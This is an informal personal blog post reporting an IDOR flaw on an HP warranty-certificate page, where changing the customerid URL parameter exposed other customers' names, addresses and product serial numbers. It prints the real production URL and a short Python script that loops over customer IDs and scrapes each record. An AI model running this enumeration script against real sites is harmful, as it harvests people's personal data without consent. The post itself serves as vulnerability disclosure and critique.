HI! all I am writing blog post really after a very long time . Sorry!
The Hewlett-Packard Company is an American global information technology company head quartered in Palo Alto, California, United States.
Few months back I purchased a Laptop of HP. After purchasing I had to register myself for warranty extensions and stuffs and those process were online. After completing my process they sent me an email regrading that , my order has been registered and all . So please download a certificate of that.
https://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:#USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid=30394780&provider=1
Now when I looked at the URL the parameter customerid looked interesting. Let change that and check what happens. Viola
Name
Address
Product Serial No.
Product Number Product Description
HP Care Pack Serial NumberBAD RIGHT ?
Since ID what I got was somewhere 30394780 … So I guess to many data getting exposed.
I wrote a simple python code for it
import re
import urllib2,sys
from bs4 import BeautifulSoup
id = 30394790
while (id < 30394850):
html = urllib2.urlopen(“http://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:%23USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid={id}&provider=1”.format(id=id)).read()
soup = BeautifulSoup(html)
text = soup.get_text()
text2 = text.replace(“\n”, “”)
text2 = text2.replace(” “, “\n”)
text2 = text2.replace(“\n”, “”) #meh was just trying to remove garbage whitespaces
id = id + 1
print “DATA OF ” + str(id) + “\n \n”
print text2
Conclusion everything is getting online and big companies are yet to be realize that their customers data is at risk. Making world wide reports on cyber security and yet themselves failing to protect their customers data is an irony.
And why leaking out these serial number and product id’s are bad ? Read out this story how a pro social engineer ripped many big companies and one of his method included cracking the serial number pattern of a product.
http://kernelmag.dailydot.com/issue-sections/features-issue-sections/13930/social-engineering-scripts/